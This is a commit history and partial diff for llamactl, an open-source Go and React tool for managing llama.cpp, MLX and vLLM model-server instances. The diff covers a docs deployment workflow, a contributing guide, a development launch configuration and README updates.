212 Commits

Author SHA1 Message Date
12bbf34236 Merge pull request #46 from lordmathis/feat/env-vars
feat: Add support for passing env vars to instances
2025-09-28 15:42:02 +02:00
9a7255a52d Refactor Docker support section in README for clarity and conciseness 2025-09-28 15:31:50 +02:00
97a7c9a4e3 Detail env var support in docs 2025-09-28 15:29:43 +02:00
fa9335663a Parse backend env vars from env vars 2025-09-28 15:22:01 +02:00
d092518114 Update documentation 2025-09-28 15:10:35 +02:00
ffa0a0c161 Remove ZodFormField and BasicInstanceFields components 2025-09-28 14:42:10 +02:00
1fbf809a2d Add EnvironmentVariablesInput component and integrate into InstanceSettingsCard 2025-09-28 14:42:10 +02:00
c984d95723 Add environment variable support to instance options and command building 2025-09-28 14:42:10 +02:00
50e1355205 Add environment field to BackendSettings for improved configuration 2025-09-28 14:42:10 +02:00
7994fd05b3 Merge pull request #44 from BobbyL2k/fix/rel-dir-config
fix: InstancesDir and LogsDir not being relative path to DataDir when not set
2025-09-27 21:33:00 +02:00
Anuruth Lertpiya
f496a28f04 fix: InstancesDir and LogsDir not being relative path to DataDir when not set 2025-09-27 18:14:25 +00:00
f9371e876d Merge pull request #43 from BobbyL2k/fix/config-path
fix: llamactl reads config file per documentation
2025-09-27 19:32:13 +02:00
Anuruth Lertpiya
3a979da815 fix: llamactl reads config file per documentation
- Added logging to track config file reading operations
- llamactl now properly reads config files from the expected locations ("llamactl.yaml" and "config.yaml" under current directory)
2025-09-27 17:03:54 +00:00
a824f066ec Merge pull request #42 from lordmathis/feat/docker-backends
feat: Add support for dockerized backends
2025-09-25 23:07:24 +02:00
2cd9d374a7 Add Docker badge to UI 2025-09-25 23:04:24 +02:00
031d6c7017 Update Docker command arguments for llama-server and vllm with volume mounts 2025-09-25 22:51:51 +02:00
282344af23 Fix docker command args building 2025-09-25 22:51:40 +02:00
bc9e0535c3 Refactor command building and argument handling 2025-09-25 22:05:46 +02:00
2d925b473d Add Docker support documentation and configuration for backends 2025-09-24 22:15:21 +02:00
ba0f877185 Fix tests 2025-09-24 21:35:44 +02:00
840a7bc650 Add Docker command handling for backend options and refactor command building 2025-09-24 21:34:54 +02:00
76ac93bedc Implement Docker command handling for Llama, MLX, and vLLM backends 2025-09-24 21:31:58 +02:00
72d2a601c8 Update Docker args in LoadConfig and tests to include 'run --rm' prefix 2025-09-24 21:27:51 +02:00
9a56660f68 Refactor backend configuration to use structured settings and update environment variable handling 2025-09-24 20:31:20 +02:00
78a483ee4a Merge pull request #41 from lordmathis/fix/docs-release
fix: Refactor docs workflow to trigger on version tags
2025-09-23 22:35:05 +02:00
cdcef7c7ae Refactor docs workflow to trigger on version tags 2025-09-23 22:32:02 +02:00
6f5d886089 Merge pull request #40 from lordmathis/feat/system-info
feat: rework system info dialog
2025-09-23 22:11:42 +02:00
e3bf8ac05a Update SystemInfo dialog 2025-09-23 22:05:31 +02:00
edf0575925 Replace SystemInfoDialog with BackendInfoDialog and update related references 2025-09-23 21:44:04 +02:00
71a48aa3b6 Update server API functions to use /backends/llama-cpp path 2025-09-23 21:28:23 +02:00
30e40ecd30 Refactor API endpoints to use /backends/llama-cpp path and update related documentation 2025-09-23 21:27:58 +02:00
322e1c5eb7 Merge pull request #39 from lordmathis/feat/instance-dialog
feat: Redesign create/edit instance dialog
2025-09-23 21:14:34 +02:00
2cbd666d38 Redesign create/edit instance dialog 2025-09-23 21:11:00 +02:00
9ebc05fa3a Merge pull request #38 from lordmathis/feat/instance-card
feat: Redesign instance card
2025-09-23 19:48:20 +02:00
05e4335389 Fix instance management tests 2025-09-23 19:45:45 +02:00
850cf018e3 Refactor BackendBadge component 2025-09-23 19:20:53 +02:00
9c3da55c5d Improve InstanceCard layout 2025-09-23 18:12:58 +02:00
16d311a3d0 Merge pull request #37 from lordmathis/lordmathis-patch-1
fix: Set default docs version
2025-09-23 13:48:53 +02:00
32f58502de Update docs.yml 2025-09-23 13:46:58 +02:00
788f5a2246 Merge pull request #36 from lordmathis/lordmathis-patch-1
fix: Run docs build job on every update
2025-09-23 13:21:53 +02:00
37f464007f Update docs.yml 2025-09-23 13:19:54 +02:00
84d994c625 Merge pull request #35 from lordmathis/chore/docs-update
chore: Update docs
2025-09-22 23:24:12 +02:00
120875351f Fix image paths for MkDocs rendering in readme_sync.py 2025-09-22 23:22:27 +02:00
3a63308d5f Update error descriptions in API documentation for clarity 2025-09-22 22:39:01 +02:00
46622d2107 Update documentation and add README synchronization 2025-09-22 22:37:53 +02:00
ebc82c37aa Merge pull request #34 from lordmathis/feat/vllm-backend
feat: Implement vLLM backend
2025-09-22 21:58:19 +02:00
48b3a39dfe Move badges in instance card 2025-09-22 21:54:04 +02:00
c10153f59f Add BackendBadge component and integrate it into InstanceCard 2025-09-22 21:48:33 +02:00
588b025fb1 Handle empty responses for JSON endpoints in apiCall function 2025-09-22 21:39:44 +02:00
6dcf0f806e Fix VLLM command placeholder formatting 2025-09-22 21:30:59 +02:00
184d6df1bc Fix vllm command parsing 2025-09-22 21:25:50 +02:00
313666ea17 Fix missing vllm proxy setup 2025-09-22 20:51:00 +02:00
c3ca5b95f7 Update BuildCommandArgs to use positional argument for model and adjust tests accordingly 2025-09-22 20:32:03 +02:00
2c86fc6470 Update api referrence 2025-09-21 22:16:56 +02:00
785915943b Update api docs 2025-09-21 22:03:07 +02:00
55765d2020 Add vLLM backend support to documentation and update instance management instructions 2025-09-21 21:57:36 +02:00
6ff9aa5470 Remove vLLM backend implementation specification document 2025-09-21 21:38:10 +02:00
501afb7f0d Refactor form components and improve API error handling 2025-09-21 21:33:53 +02:00
b665194307 Add vLLM backend support to webui 2025-09-21 20:58:43 +02:00
7eb59aa7e0 Remove unused JSON unmarshal test and clean up command argument checks 2025-09-19 20:46:25 +02:00
64842e74b0 Refactor command parsing and building 2025-09-19 20:23:25 +02:00
34a949d22e Refactor command argument building and parsing 2025-09-19 19:59:46 +02:00
ec5485bd0e Refactor command argument building across backends 2025-09-19 19:46:54 +02:00
9eecb37aec Refactor MLX and VLLM server options parsing and args building 2025-09-19 19:39:36 +02:00
c7136d5206 Refactor command parsing logic across backends to utilize a unified CommandParserConfig structure 2025-09-19 18:36:23 +02:00
4df02a6519 Initial vLLM backend support 2025-09-19 18:05:12 +02:00
02fdae24ee Merge pull request #33 from lordmathis/feat/doc-versioning
feat: Docs versioning
2025-09-18 21:07:04 +02:00
9a8647775d Setup docs versioning 2025-09-18 21:04:11 +02:00
3081a1986b Merge pull request #32 from lordmathis/feat/mlx-backend
feat: Implement mlx-lm backend
2025-09-18 20:34:04 +02:00
6a580667ed Remove LlamaExecutable checks from default and file loading tests 2025-09-18 20:30:26 +02:00
2a20817078 Remove redundant LlamaExecutable field from instance configuration in tests 2025-09-18 20:29:04 +02:00
5e2d237887 Update project description for clarity and consistency in README 2025-09-18 20:21:30 +02:00
84c3453281 Refactor features section in README for improved clarity and organization 2025-09-18 20:14:03 +02:00
8006dd3841 Fix formatting in README for consistency in feature descriptions 2025-09-18 20:03:19 +02:00
8820dc1146 Enhance documentation for MLX backend support 2025-09-18 20:01:18 +02:00
11296bc5f8 Update README to include MLX backend support and enhance usage instructions 2025-09-18 19:34:40 +02:00
5121f0e302 Remove PythonPath references from MlxServerOptions and related configurations 2025-09-17 21:59:55 +02:00
587be68077 Add MLX backend support with configuration and parsing enhancements 2025-09-16 22:38:39 +02:00
cc5d8acd92 Refactor instance and manager tests to use BackendConfig for LlamaExecutable and MLXLMExecutable 2025-09-16 21:45:50 +02:00
154b754aff Add MLX command parsing and routing support 2025-09-16 21:39:08 +02:00
63fea02d66 Add MLX backend support in CreateInstanceOptions and validation 2025-09-16 21:38:33 +02:00
468688cdbc Pass backend options to instances 2025-09-16 21:37:48 +02:00
988c4aca40 Add MLX backend config options 2025-09-16 21:14:19 +02:00
1f25e9d05b Merge pull request #31 from lordmathis/feat/parse-command
feat: Implement command parsing in Create Instance
2025-09-15 22:18:39 +02:00
1b5934303b Enhance command parsing in ParseLlamaCommand and improve error handling in ParseCommandRequest 2025-09-15 22:12:56 +02:00
ccabd84568 Add margin to textarea in ParseCommandDialog for improved spacing 2025-09-15 21:36:24 +02:00
e7b06341c3 Enhance command parsing in ParseLlamaCommand 2025-09-15 21:29:46 +02:00
323056096c Implement llama-server command parsing and add UI components for command input 2025-09-15 21:04:14 +02:00
cb1669f853 Merge pull request #30 from lordmathis/dependabot/npm_and_yarn/webui/npm_and_yarn-f5c1666f0c
Bump vite from 7.0.5 to 7.1.5 in /webui in the npm_and_yarn group across 1 directory
2025-09-14 10:47:38 +02:00
dependabot[bot]
a5d1f24cbf Bump vite in /webui in the npm_and_yarn group across 1 directory
Bumps the npm_and_yarn group with 1 update in the /webui directory: [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).


Updates `vite` from 7.0.5 to 7.1.5
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v7.1.5/packages/vite)

---
updated-dependencies:
- dependency-name: vite
  dependency-version: 7.1.5
  dependency-type: direct:development
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
2025-09-09 21:38:38 +00:00
92f0bd02f2 Merge pull request #29 from lordmathis/lordmathis-patch-1
chore: Switch main dashboard screenshot
2025-09-04 22:54:06 +02:00
0a16f617ad Add files via upload 2025-09-04 22:47:14 +02:00
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-referrence 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Imrove getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
a6e3cb4a9b Merge pull request #23 from lordmathis/feat/start-on-request
feat: On-Demand Instance Start
2025-08-20 16:04:59 +02:00
9181c3d7bc Remove unused import from zodFormUtils.ts 2025-08-20 16:03:09 +02:00
1939b45312 Refactor WaitForHealthy method to use direct health check URL and simplify health check logic 2025-08-20 15:58:08 +02:00
8265a94bf7 Add on-demand start configuration to instance options and basic fields 2025-08-20 14:56:11 +02:00
4bc9362f7a Add default on-demand start settings and timeout configuration to README 2025-08-20 14:41:42 +02:00
ddb54763f6 Add OnDemandStartTimeout configuration and update OpenAIProxy to use it 2025-08-20 14:25:43 +02:00
496ab3aa5d Update README to clarify on-demand instance start feature 2025-08-20 14:22:55 +02:00
287a5e0817 Implement WaitForHealthy method and enhance OpenAIProxy to support on-demand instance start 2025-08-20 14:19:12 +02:00
7b4adfa0cd Add DefaultOnDemandStart configuration and update instance options 2025-08-20 13:50:43 +02:00
651c8b9b2c Merge pull request #22 from lordmathis/feat/timeout
feat: Implement idle instance timeout
2025-08-20 13:34:38 +02:00
7194e1fdd1 Update README to clarify idle timeout management and state persistence features 2025-08-20 13:32:03 +02:00
492c3ff270 Remove redundant timeout tests and improve test coverage for instance timeout validation 2025-08-20 13:25:56 +02:00
00a3cba717 Enhance shutdown handling in InstanceManager with proper synchronization and max instances check 2025-08-19 22:34:48 +02:00
eb1d4ab55f Enhance timeout functionality tests to validate configuration and logic without starting instances 2025-08-19 20:52:59 +02:00
a9e3801eae Refactor logging in checkAllTimeouts 2025-08-19 19:25:15 +02:00
1aaab96cec Add idle timeout configuration to instance options and basic fields 2025-08-19 19:24:54 +02:00
78eda77e44 Enhance timeout handling in InstanceManager with goroutine recovery and shutdown support 2025-08-17 22:49:28 +02:00
d70bb634cd Implement instance tests for timeout 2025-08-17 21:50:16 +02:00
41eaebc927 Add TimeoutCheckInterval to instance configuration in tests 2025-08-17 21:42:52 +02:00
c45fa13206 Initialize last request time on instance start and update timeout handling logic 2025-08-17 21:15:28 +02:00
5e3a28398d Implement periodic timeout checking for instances 2025-08-17 21:10:48 +02:00
c734bcae4a Move UpdateLastRequestTime method to timeout.go and add ShouldTimeout method for idle timeout handling 2025-08-17 20:37:20 +02:00
e4e7a82294 Implement last request time tracking for instance management 2025-08-17 19:44:57 +02:00
ccffbca6b2 Add timeout check interval and update instance configuration 2025-08-17 19:26:21 +02:00
902be409d5 Add IdleTimeout option to CreateInstanceOptions and update JSON handling 2025-08-17 19:06:09 +02:00
eb9599f26a Merge pull request #21 from lordmathis/feat/dark-mode
feat: Implement dark theme and theme switching
2025-08-11 17:56:16 +02:00
ebf8dfdeab Mock window.matchMedia for dark mode functionality in tests 2025-08-11 17:54:04 +02:00
f15c0840c4 Implement dark theme and theme switching 2025-08-11 17:39:56 +02:00
e702bcb694 Create CNAME 2025-08-08 13:41:58 +02:00
4895fbff15 Merge pull request #20 from lordmathis/docs/contributing
docs: Add CONTRIBUTING.md to outline development setup and contribution process
2025-08-07 21:13:01 +02:00
282fe67355 Add CONTRIBUTING.md to outline development setup and contribution process 2025-08-07 21:10:01 +02:00
96a36e1119 Merge pull request #19 from lordmathis/docs/readme-screenshot
docs: Add dashboard screenshot to README
2025-08-07 19:55:15 +02:00
759fc58326 Update README to include dashboard screenshot 2025-08-07 19:51:34 +02:00
afef3d0180 Update import path for API documentation to use apidocs 2025-08-07 19:48:28 +02:00
a87652937f Move swagger documentation to apidoc 2025-08-07 19:48:03 +02:00
7bde12db47 Merge pull request #18 from lordmathis/feat/show-version
feat: Show app version on backend and frontend
2025-08-07 19:11:58 +02:00
e2b64620b5 Expose version endpoint 2025-08-07 19:10:06 +02:00
3ba62af01a Add VITE_APP_VERSION to environment and update SystemInfoDialog to display version 2025-08-07 19:01:31 +02:00
0150429e82 Add commit hash and build time to version output 2025-08-07 18:48:35 +02:00
2ecf096024 Add version flag to display llamactl version 2025-08-07 18:46:49 +02:00
5aed01b68f Merge pull request #17 from lordmathis/fix/forbidden-logs
fix: Refactor log fetching to use instancesApi
2025-08-06 19:12:34 +02:00
3f9caff33b Refactor log fetching to use instancesApi 2025-08-06 19:07:25 +02:00
169254c61a Merge pull request #16 from lordmathis/fix/llama-server-options
fix: Missing or wrong llama server options
2025-08-06 18:51:18 +02:00
8154b8d0ab Fix temp in tests 2025-08-06 18:49:36 +02:00
a26d853ad5 Fix missing or wrong llama server options on frontend 2025-08-06 18:40:05 +02:00
6203b64045 Fix missing or wrong llama server options 2025-08-06 18:31:17 +02:00
8d9c808be1 Merge pull request #14 from lordmathis/docs/readme-updates
docs: Update README.md to improve project description
2025-08-05 21:32:20 +02:00
161cd213c5 Update README.md to enhance project description and installation instructions 2025-08-05 21:20:37 +02:00
d6e84f0527 Merge pull request #13 from lordmathis/fix/decimal-input
fix: Allow decimal input for numeric fields in instance configuration
2025-08-05 20:03:31 +02:00
0846350d41 Fix eslint issues in ZodFormField 2025-08-05 19:21:09 +02:00
dacaca8594 Fix number input handling to allow decimal values 2025-08-05 19:15:12 +02:00
6e3f5cec61 Merge pull request #12 from lordmathis/refactor/pkg-restructure
Pkg restructure
2025-08-04 20:48:18 +02:00
85b3638efb Update ValidateInstanceName to return the validated name and modify tests accordingly 2025-08-04 20:46:15 +02:00
934d1c5aaa Refactor instance management by moving operations to a new file 2025-08-04 20:38:57 +02:00
2abe9c282e Rename config and instance struct to avoid awkward naming 2025-08-04 19:30:50 +02:00
6a7a9a2d09 Split large package into subpackages 2025-08-04 19:23:56 +02:00
a3c44dad1e Merge pull request #11 from lordmathis/feat/state-persistance
feat: Persist instances configs across app restarts
2025-08-02 23:47:35 +02:00
7426008ef9 Use instance directly in DeleteInstance 2025-08-02 23:35:03 +02:00
cf26aa521a Update README.md to enhance API Key authentication section and provide usage examples 2025-08-02 23:15:25 +02:00
d94c922314 Update README.md for data persistence features 2025-08-02 23:02:30 +02:00
3cbd23a6e2 Implement persistence tests 2025-08-02 22:52:50 +02:00
bed172bf73 Implement instance loading and auto-start functionality on manager initialization 2025-08-02 21:39:19 +02:00
d449255bc9 Persist instance state after starting and stopping instances 2025-08-02 21:23:31 +02:00
de89d0673a Implement instance persistence with JSON file storage and deletion 2025-08-02 21:09:16 +02:00
dd6ffa548c Refactor configuration structure to replace DataConfig with instance-specific directories and auto-creation options 2025-08-02 19:10:40 +02:00
7935f19cc1 Add data directory configuration with auto-creation option 2025-08-02 15:33:33 +02:00
f1718198a3 Merge pull request #10 from lordmathis/fix/graceful-shutdown
Implement graceful shutdown
2025-08-01 23:44:58 +02:00
b24d744cad Implement graceful shutdown for the server and add Shutdown method to InstanceManager 2025-08-01 23:41:18 +02:00
fff8b2dbde Merge pull request #9 from lordmathis/docs/add-prebuilt-install-instructions
Update installation instructions in README.md to include prebuilt binaries
2025-08-01 20:23:54 +02:00
b94909dee4 Update installation instructions in README.md to include prebuilt binaries and manual download steps 2025-08-01 20:17:29 +02:00
106 changed files with 10993 additions and 4785 deletions

103
.github/workflows/docs.yml vendored Normal file

@@ -0,0 +1,103 @@
name: Build and Deploy Documentation

on:
  push:
    branches: [ main ]
    tags: [ 'v*' ]
  pull_request:
    branches: [ main ]
    paths:
      - 'docs/**'
      - 'mkdocs.yml'
      - 'docs-requirements.txt'

permissions:
  contents: write
  pages: write
  id-token: write

concurrency:
  group: "pages"
  cancel-in-progress: false

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'
      - name: Install dependencies
        run: |
          pip install -r docs-requirements.txt
      - name: Build documentation
        run: |
          mkdocs build --strict

  deploy-dev:
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/main' && github.event_name == 'push'
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'
      - name: Install dependencies
        run: |
          pip install -r docs-requirements.txt
      - name: Configure Git
        run: |
          git config --global user.name "${{ github.actor }}"
          git config --global user.email "${{ github.actor }}@users.noreply.github.com"
      - name: Deploy development version
        run: |
          mike deploy --push --update-aliases dev latest
          # Set dev as default if no default exists
          if ! mike list | grep -q "default"; then
            mike set-default --push dev
          fi

  deploy-release:
    runs-on: ubuntu-latest
    if: startsWith(github.ref, 'refs/tags/v')
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'
      - name: Install dependencies
        run: |
          pip install -r docs-requirements.txt
      - name: Configure Git
        run: |
          git config --global user.name "${{ github.actor }}"
          git config --global user.email "${{ github.actor }}@users.noreply.github.com"
      - name: Deploy release version
        run: |
          VERSION=${GITHUB_REF#refs/tags/}
          mike deploy --push --update-aliases $VERSION stable
          mike set-default --push stable
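For a local check of what these jobs do, the same mike commands can be run by hand — a sketch, assuming the packages from `docs-requirements.txt` are installed and you are on a checkout with full history:

```bash
pip install -r docs-requirements.txt
mike deploy --update-aliases dev latest   # build the "dev" version into the local gh-pages branch (no --push)
mike serve                                # preview the versioned site locally
```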


@@ -29,6 +29,8 @@ jobs:
npm ci
- name: Build Web UI
env:
VITE_APP_VERSION: ${{ github.ref_name }}
run: |
cd webui
npm run build

4
.gitignore vendored

@@ -32,4 +32,6 @@ go.work.sum
# .vscode/
node_modules/
dist/
dist/
__pycache__/

19
.vscode/launch.json vendored Normal file

@@ -0,0 +1,19 @@
{
    // Use IntelliSense to learn about possible attributes.
    // Hover to view descriptions of existing attributes.
    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Launch Server",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "${workspaceFolder}/cmd/server/main.go",
            "env": {
                "GO_ENV": "development",
                "LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
            },
        }
    ]
}

1
CNAME Normal file

@@ -0,0 +1 @@
llamactl.org

182
CONTRIBUTING.md Normal file

@@ -0,0 +1,182 @@
# Contributing to Llamactl
Thank you for considering contributing to Llamactl! This document outlines the development setup and contribution process.
## Development Setup
### Prerequisites
- Go 1.24 or later
- Node.js 22 or later
- `llama-server` executable (from [llama.cpp](https://github.com/ggml-org/llama.cpp))
### Getting Started
1. **Clone the repository**
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
```
2. **Install dependencies**
```bash
# Go dependencies
go mod download
# Frontend dependencies
cd webui && npm ci && cd ..
```
3. **Run for development**
```bash
# Start backend server
go run ./cmd/server
```
Server will be available at `http://localhost:8080`
```bash
# In a separate terminal, start frontend dev server
cd webui && npm run dev
```
Development UI will be available at `http://localhost:5173`
4. **Common development commands**
```bash
# Backend
go test ./... -v # Run tests
go test -race ./... -v # Run with race detector
go fmt ./... && go vet ./... # Format and vet code
# Frontend (run from webui/ directory)
npm run test:run # Run tests once
npm run test # Run tests in watch mode
npm run type-check # TypeScript type checking
npm run lint:fix # Lint and fix issues
```
## Before Submitting a Pull Request
### Required Checks
All the following must pass:
1. **Backend**
```bash
go test ./... -v
go test -race ./... -v
go fmt ./... && go vet ./...
go build -o llamactl ./cmd/server
```
2. **Frontend**
```bash
cd webui
npm run test:run
npm run type-check
npm run build
```
### API Documentation
If changes affect API endpoints, update Swagger documentation:
```bash
# Install swag if needed
go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
```
## Pull Request Guidelines
### Pull Request Titles
Use this format for pull request titles:
- `feat:` for new features
- `fix:` for bug fixes
- `docs:` for documentation changes
- `test:` for test additions or modifications
- `refactor:` for code refactoring
### Submission Process
1. Create a feature branch from `main`
2. Make changes following the coding standards
3. Run all required checks listed above
4. Update documentation if necessary
5. Submit pull request with:
- Clear description of changes
- Reference to any related issues
- Screenshots for UI changes
## Code Style and Testing
### Testing Strategy
- Backend tests use Go's built-in testing framework
- Frontend tests use Vitest and React Testing Library
- Run tests frequently during development
- Add tests for new features and bug fixes
### Go
- Follow standard Go formatting (`go fmt`)
- Use meaningful variable and function names
- Add comments for exported functions and types
- Handle errors appropriately
### TypeScript/React
- Use TypeScript strictly (avoid `any` when possible)
- Follow React hooks best practices
- Use meaningful component and variable names
- Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)
- Review the [README.md](README.md) for usage documentation
- Look at existing code for patterns and conventions
Thank you for contributing to Llamactl!

388
README.md

@@ -2,265 +2,231 @@
![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
A control server for managing multiple Llama Server instances with a web-based dashboard.
**Unified management and routing for llama.cpp, MLX and vLLM models with web dashboard.**
## Features
- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances
- **Web Dashboard**: Modern React-based UI for managing instances
- **Auto-restart**: Configurable automatic restart on instance failure
- **Instance Monitoring**: Real-time health checks and status monitoring
- **Log Management**: View, search, and download instance logs
- **REST API**: Full API for programmatic control
- **OpenAI Compatible**: Route requests to instances by instance name
- **Configuration Management**: Comprehensive llama-server parameter support
- **System Information**: View llama-server version, devices, and help
### 🚀 Easy Model Management
- **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
- **On-Demand Instance Start**: Automatically launch instances upon receiving API requests
- **State Persistence**: Ensure instances remain intact across server restarts
## Prerequisites
### 🔗 Universal Compatibility
- **OpenAI API Compatible**: Drop-in replacement - route requests by instance name
- **Multi-Backend Support**: Native support for llama.cpp, MLX (Apple Silicon optimized), and vLLM
- **Docker Support**: Run backends in containers
This project requires `llama-server` from llama.cpp to be installed and available in your PATH.
### 🌐 User-Friendly Interface
- **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
- **API Key Authentication**: Separate keys for management vs inference access
**Install llama.cpp:**
Follow the installation instructions at https://github.com/ggml-org/llama.cpp
### ⚡ Smart Operations
- **Instance Monitoring**: Health checks, auto-restart, log management
- **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
- **Environment Variables**: Set custom environment variables per instance for advanced configuration
## Installation
![Dashboard Screenshot](docs/images/dashboard.png)
### Build Requirements
- Go 1.24 or later
- Node.js 22 or later (for building the web UI)
### Building with Web UI
## Quick Start
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# 1. Install backend (one-time setup)
# For llama.cpp: https://github.com/ggml-org/llama.cpp#quick-start
# For MLX on macOS: pip install mlx-lm
# For vLLM: pip install vllm
# Or use Docker - no local installation required
# Install Node.js dependencies
cd webui
npm ci
# 2. Download and run llamactl
